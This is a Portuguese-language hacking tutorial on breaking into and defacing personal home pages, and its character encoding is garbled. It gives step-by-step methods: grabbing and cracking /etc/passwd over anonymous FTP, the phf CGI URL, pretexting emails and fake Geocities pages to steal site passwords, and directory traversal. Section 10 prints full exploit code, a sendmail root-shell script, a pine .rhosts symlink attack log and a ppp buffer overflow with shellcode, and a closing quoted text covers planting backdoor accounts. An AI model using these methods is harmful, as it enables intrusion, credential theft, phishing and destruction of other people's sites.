hp.html

HACKEANDO HOME PAGES

Texto por: �� †��†� � ��

1-INTRODU��O :

O texto a seguir fala sobre como hackear uma home page. Aqui est�o as suas se��es : Precau��es-cuidados que voc� deve tomar. Sobre as senhas-arquivos falando sobre as senhas. Desencryptando as senhas-como desencryptar senhas. Ftp-como hackear uma HP por ftp. Phf-como hackear uma HP usando o m�todo phf Home page gr�tis-como hackear servidores de home page gr�tis Home page gr�tis 2-Outro m�todo de como hackear servidores de home pages gr�tis J� cadastrado-Como hackear uma home page que voc� j� tenha cadastro no mesmo servidor Telnet e exploits-Como hackear uma page usando telnet e exploits J� cadastrado 2-Outro metodo de como hackear uma hp que voc� j� tenha cadastro no mesmo servidor.

2-PRECAU��ES:

Nesse texto vou ensinar deversos m�todos de como hackear uma home page. Queria avisar que hackear uma home page � considerado crime e que isso d� cadeia. Toda vez que voc� entra em um sistema seu IP fica gravado e "eles" v�o poder te encontrar. Portanto antes de cometer um ato como esse eu sugiro que voc�s tomem umas medidas de seguran�a como spoofing e etc...

3-SOBRE AS SENHAS :

A senha esta em um arquivo chamado passwd. Esse arquivo est� normalmente em um diret�rio chamado etc/passwd. Ent�o vamos falar um pouco sobre o passwd. Quando voc� pega o arquivo passwd, a senha pode vir encryptada ou ent�o com shadow! A diferen�a � que a senha encryptada � a pr�pria senha s� que esta encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou seja, n�o vai estar no passwd, vai estar em outro diret�rio. Para obter a senha escrita voc� vai ter que desencripta-la! As senhas com shadow s�o imposs�veis de "desencryptar"! (levando em conta que voc� n�o tem unix). Uma senha encryptada � mais ou menos assim :
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh

Agora o exemplo de uma senha com shadow :
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh

daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/
usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW
Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Voc� pode notar que tem um "x" no root! Esse x pode ser representado tamb�m por um "*". Agora voc� j� sabe um pouco mais sobre o arquivo passwd e sobre as senhas.

4-DESENCRYPTANDO :

Para desencryptar uma senha precisaremos de tr�s arquivos b�sicos. Uma word list, um desencryptador (recomendo o crackerjack/jack 14)e logicamente o arquivo onde est� senha(passwd). O que � cada um? Word list- Como o pr�prio nome j� diz, � uma lista de palavras. Desencryptador- � o programa que voc� vai usar para desencryptar a senha. Passwd- Nesse arquivo est� a senha encryptada.

Coloque todos esses itens nesse mesmo diret�rio. Abra o prompt do DOS e entre no diret�rio onde eles est�o. Agora fa�a o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde esta a senha" "nome da sua word list" Ent�o vamos supor que meu programa � o jack, o arquivo � o passwd, a word list � lista. Ent�o ficaria assim : jack passwd lista.txt

E pronto! A senha est� desencryptada! Mas como isso funciona?? Quando voc� roda o jack ele pega o arquivo passwd e testa com todas as palavras da word list.

5-FTP

Hackear uma HP por ftp talvez seja o melhor metodo. � bem simples e r�pido de ser feito. Para fazer isso vamos usar o prompt do MS-DOS. Espero que voc� saiba pelo menos mexer no b�sico do DOS. O que vamos faz � simplesmente entrar no ftp da home page com login anonymous e fazer o download do arquivo passwd. Abra o prompt do DOS. Voc� vai ter que entrar no ftp da HP que voce quer hackear. Normalmente a endere�o � o mesmo da home page. Ent�o digite ftp www.hackers.com Ele vai pedir seu USER. Coloque anonymous. Agora vai pedir que voc� coloque seu e-mail completo como senha. Claro que voc� vai colocar alguma coisa qualquer, tipo [email protected]. Voc� vai entrar no ftp como user anonymous e retrictions applly! Isso significa que voc� entrou como anonymous e com restri��es aplicadas! Agora voc� precisa ir para o diret�rio etc. Entre e fa�a o donwload do passwd. Pra isso digite "get passwd". Pronto, o arquivo passwd vai estar no diret�rio que voc� estava quando entrou no ftp. Tipo windows, arquivos de programas.... Agora voc� que tem o arquivo s� precisa desencryptalo e pronto! A senha estar� em suas m�os..

6-PHF : O phf � com certeza o modo mais simples de se obter o arquivo passwd. � t�o simples que voc� n�o precisa saber nada! A �nica coisa que voc� tem que fazer � abrir seu browser e colocar uma URL. Por�m esse m�todo tem 95% de chance de n�o funcionar! A maioria dos servidores j� acharam o bug e concertaram. S� colocar essa URL no location do seu browser :
http://Endere�o_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd

Apenas isso e pronto!

7-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1):

Alguns servidores de home page tipo a geocities, tripod e a angelfire, d�o espa�o para pessoas colocarem suas home pages no ar. H� um modo bem simples de se obter ]a senha de home pages que est�o nesses servidores. Tudo que voce tem que fazer � mandar um e-mail pedindo pra eles te mandarem a senha da home page. Mas n�o mande um e-mail est�pido tipo : "por favor me mandem a senha". Fa�am algo mais convincente. Pegue todas as informa��es da HP poss�veis. Do tipo : "M�s passado eu me cadastrei no servi�o de voc�s e recebi uma senha e um user name e meu endere�o "endere�o da HP do cara". Eu coloquei algumas coisas no meu espa�o e sa� de f�rias. Quando voltei das ferias eu tinha me esquecido da senha!! S� me lembrava do user name, que � : "user name da HP". Fiquei um bom tempo de ferias e n�o pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de voc�s. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que voc�s me mandem um e-mail para "seu e-mail". Porque eu n�o tenho o backup dos arquivos que coloquei l� e n�o gostaria de perde-los. Obrigado pela aten��o. Espero que voces mandem a senha o mais r�pido que puderem."

Companhias como a geocities s�o muito ocupadas pra ficar verificando se � verdade eu n�o! Provavelmente eles iram acreditar e em 2 semanas(mais ou menos) voc� receber� a senha no seu e-mail!

8- HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2): Outro modo de hackear esse tipo de home pages � enganar o pr�prio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que n�o sabem muito coisa e nem percebem que eles mesmos est�o dando a senha para o hackeador. � outro m�todo bem simples mas um pouco mais demorado. O que voc� tem que fazer � criar uma pagina onde voc� finge que � a geocities que esta dando mais megas para HP's! Ou seja, voc� ter� que criar uma p�gina imitando a geocities! Fa�a uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formul�rio pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espa�o pra HP!!! Nesse formul�rio o cara ter� que colocar o user e a senha da HP, o endere�o e etc.... Para o cara "receber" os megas ele ter� que enviar o formul�rio. Para isso ela dever� clicar em algum bot�o de envio, normalmente um bot�o que fica escrito "submit" Quando a pessoa clica no bot�o submit formul�rio � enviado para a geocities pois aquele bot�o tem um comando para enviar para a geocities.Ent�o o que voc� ter� que fazer � mudar o comando. Em vez do formul�rio ser enviado para a geocities esse formul�rio vai ser enviado para o seu e-mail. Para isso voc� ter� que editar a pagina da geocities. No lugar que tem escrito:

Ent�o assim que o cara clicar no bot�o submit todos os dados seram enviados para o seu e-mail. E assim voc� ter� a senha. Agora � s� pegar um endere�o na net e colocar essa pagina editada na geocities nele e mandar as pessoas visitarem. E pronto! O formul�rio vai chegar com a senha e user name no teu e-mail.

H� uma tecnica parecida com essa mas � MUITO mais complicada. Pra isso voc� vai precisar de um servidor pessoal e ter� que mudar algumas configura��es em TCP/IP Pra isso abra o painel de controle e entre no �cone redes. Agora entre nas propriedades de TCP/IP. Entre na conficura��o DNS. Selecione ativar DNS. Agora escreva no HOST-->WWW.GEOClTIES(repare que geocities est� escrito com "l" e n�o um "i") Ent�o escreva no dominio-->COM. Agora d� OK em tudo. Vai pedir que voc� reinicie o micro. Pode reiniciar. Siga o mesmo procedimento do formul�rio e da pagina da geocities da explica��o anterior. Salva essa pagina e coloque-a no diret�rio de paginas do seu servidor. Ent�o voce cria um diret�rio chamado "members", entra nesse diret�rio e crie um, diret�rio chamado "tools". Coloque tudo da page editada nesse diret�rio. Coloque seu servidor pra funcionar e mande o cara entrar em : HTTP://WWW.GEOClTIES.COM/members/tools/file_manager.html

O endere�o tem que ser esse. Se a pessoa entrar no file manager da geocities isso n�o vai funcionar(ooohhh!!!) Quando o cara colocar os dados dele l� e enviar estar� tudo no teu mail!

Queria avisar que esses metodos tamb�m funcionam com a angelfire e com a tripod. A geocities foi usada como exemplo.

9-HACKEANDO UMA HP EM QUE VOCE J� TENHA CADASTRO NO MESMO SERVIDOR Esse m�todo � realmente dif�cil de funcionar mas as vezes funciona com uns admins bem idiotas. Quando voc� entra no seu ftp voc� pode sair do seu diret�rio home (diretorio onde voc� esta assim que entra) e voltar alguns diret�rios at� encontrar o diret�rio da HP que voc� quer hackear. Uma vez que voce j� fez, se voc� puder ter acesso aos arquivos HTML pegue-os e edite eles! E pronto! Com admins mais inteligentes voc� n�o consegue ter acesso os arquivos da page alvo.

10-TENET E EXPLOITS : Exploits � talvez o melhor m�todo de hackear uma home page. Mas ele � um pouco mais complicado do que os outros m�todos como phf e ftp. Antes de tudo voc� vai precisar de um programa de telnet. Exploits expo em erros e bugs nos sistemas e normalmente te d�o root, sysop, admin.... Vou listar alguns exploits abaixo :

Esse se chama sendmail bug. Ele cria um programa /tmp/x que chama shells como root.

----------------------------------------------------------------------------------------------------------------------------- 

cat << _EOF_ >/tmp/x.c  
 #define RUN "/bin/ksh"  
 #include  
 main()  
 {  
    execl(RUN,RUN,NULL);  
 }  
_EOF_  
#  
cat << _EOF_ >/tmp/spawnfish.c  
 main()  
 {  
   execl("/usr/lib/sendmail","/tmp/smtpd",0);  
 }  
_EOF_  
#  
cat << _EOF_ >/tmp/smtpd.c  
 main()  
 {  
   setuid(0); setgid(0);  
   system("chown root /tmp/x ;chmod 4755 /tmp/x");  
 }  
_EOF_  
#  
#  
gcc -O  -o /tmp/x /tmp/x.c  
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c  
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c  
#  
/tmp/spawnfish  
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed 
s/"[ ]*"// |cut -d" " -f1`  
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd 
/tmp/x.c  
sleep 5  
if [ -u /tmp/x ] ; then  
   echo "leet..."  
   /tmp/x  
fi  
---------------------------------------------------------------------------------------------------------- 

Agora mais um exploit. Eu vou mostrar o "pine exploit" vendo o processo da tabela com ps voc� pode ver
os usu�rio rodando o pine. Um ent�o pode fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada
usu�rio. Vendo o processo da tabela de novo vai revelar quais usuarios ou saem com mensagens n�o lidas
nos seus inbox. Efetivamente deletando o lockfile respectivo.  
Criando um link de /tmp/.hamors_lockfile para ~hamors/.rhosts vai fazer com que o pine crie
~hamors/.rhosts como com um arquivo 666 com as identidades processadas e que elas cont�m.  
Agora precisa fazer um " echo "+ +" > /tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile.  

-------------------------------------------------------------------------------------------------------- 

hamors (21 19:04) litterbox:~> pine  

catluvr (6 19:06) litterbox:~> ps -aux | grep pine  
catluvr   1739  0.0  1.8  100  356 pp3 S    19:07   0:00 grep 
pine  
hamors    1732  0.8  5.7  249 1104 pp2 S    19:05   0:00 pine  

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors  
- -rw-rw-rw-   1 hamors   elite           4 Aug 26 19:05 
.302.f5a4  

catluvr (8 19:07) litterbox:~> ps -aux | grep pine  
catluvr   1744  0.0  1.8  100  356 pp3 S    19:08   0:00 grep 
pine  

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts 
/tmp/.302.f5a4  

hamors (23 19:09) litterbox:~> pine  

catluvr (11 19:10) litterbox:~> ps -aux | grep pine  
catluvr   1759  0.0  1.8  100  356 pp3 S    19:11   0:00 grep 
pine  
hamors    1756  2.7  5.1  226  992 pp2 S    19:10   0:00 pine  

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4  

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4  
+ +  

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4  

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

Esse � o ultimo que vou relacionar aqui. Exploitation script para vunerabilidade ppp. Funciona em "FreeBSD".

   

#include   
#include   
#include   

#define BUFFER_SIZE     156     /* size of the bufer to 
overflow */  

#define OFFSET          -290    /* number of bytes to jump 
after the start  
                                   of the buffer */  

long get_esp(void) { __asm__("movl %esp,%eax\n"); }  

main(int argc, char *argv[])  
{  
        char *buf = NULL;  
        unsigned long *addr_ptr = NULL;  
        char *ptr = NULL;  
        char execshell[] =  
        
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" 
/* 16 bytes */  
        
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" 
/* 16 bytes */  
        
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"  
/* 20 bytes */  
        
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";    
/* 15 bytes, 57 total */  
   
        int i,j;  

        buf = malloc(4096);  

        /* fill start of bufer with nops */  

        i = BUFFER_SIZE-strlen(execshell);  

        memset(buf, 0x90, i);  
        ptr = buf + i;  

        /* place exploit code into the buffer */  

        for(i = 0; i < strlen(execshell); i++)  
                *ptr++ = execshell[i];  

        addr_ptr = (long *)ptr;  
        for(i=0;i < (104/4); i++)  
                *addr_ptr++ = get_esp() + OFFSET;  

        ptr = (char *)addr_ptr;  
        *ptr = 0;  

        setenv("HOME", buf, 1);  

        execl("/usr/sbin/ppp", "ppp", NULL);  
}

Agora voce tem o root. Fa�a o que voc� quiser! Mas eu trocaria logo a senha da HP antes de mexer em qualquer coisa ou deletar. Pra trocar a senha da HP voce tem que � entrar via telnet E entrar com sua nova conta Ae voce digita "passwd :". Vai pedir a senha antiga e depois a senha que voc� quer colocar. Agora voc� s� voce tem a senha e ent�o � s� fazer o que voc� quiser como deletar tudo e fazer o Upload das suas paginas.

11-HACKEANDO UMA HP QUE VOC� TENHA CADASTRO NO MESMO SERVIDOR.(2)

Eu li esse texto e achei bem interessante falar sobre ele. Eu nao vou escrever esse metodo por mim porque prefiro deixar ele intacto, pois por descuido eu poderia corromper alguma informa��o. Infelizmente o texto � em ingles! Desculpe se voc� nao fala...

Exploiting Net Adminstration CGI (taken from a text by Lord Somer)

Well since nethosting.com either shutdown or whatever I figured what the hell before I forget how I did the more recent hacks etc... I'd tell you how so maybe you'll find the same sys elsewhere or be able to use it for ideas.

Basically Nethosting.com did all it's administration via cgi's at net-admin.nethosting.com, well you need an account, card it if necessary, log in to net-administration, you'll see crap like ftp administration, email, etc... who really cares about e-mail so we'll go to ftp. Click on ftp administration. Lets say you were logged in as 7thsphere.com your url would be something like:
http://net-admin.nethosting.com/cgi-bin/add_ftp.cgi?7thsphere.com+ljad32432jl

Just change the 7thsphere.com to any domain on the sys or if in the chmod cgi just del that part but keep the + sign and you edit the /usr/home dir. In the ftp administration make a backdoor account to that domain by creating an ftp who's dir is / since multiple /// still means /.

Once you have your backdoor have fun. Oh yeah and in the email you can add aliases like I did to rhad's e-mail account at 7thsphere, why the hell is he on that winsock2.2 mailing list?

Well the basic theory of this type of exploitation is that:

the cgi is passed a paramater which we change to something else to edit it's info
since it uses the stuff after the + to check that it's a valid logged in account(like hotmail does), it dosen't check the password again.
multiple ///'s in unix just mean a /, thus we can get access to people's dir or the entire /usr/home dir
Eu queria avisar aqui que todos os items relacionados aqui realmente funcionam! Se voc� nao conseguir, foi porque cometeu algum erro, ou fez "mal feito". Muita gente tem reclamado que n�o funciona... Se voc� entendeu tudo perfeitamente voc� pode hackear quase qualquer home page.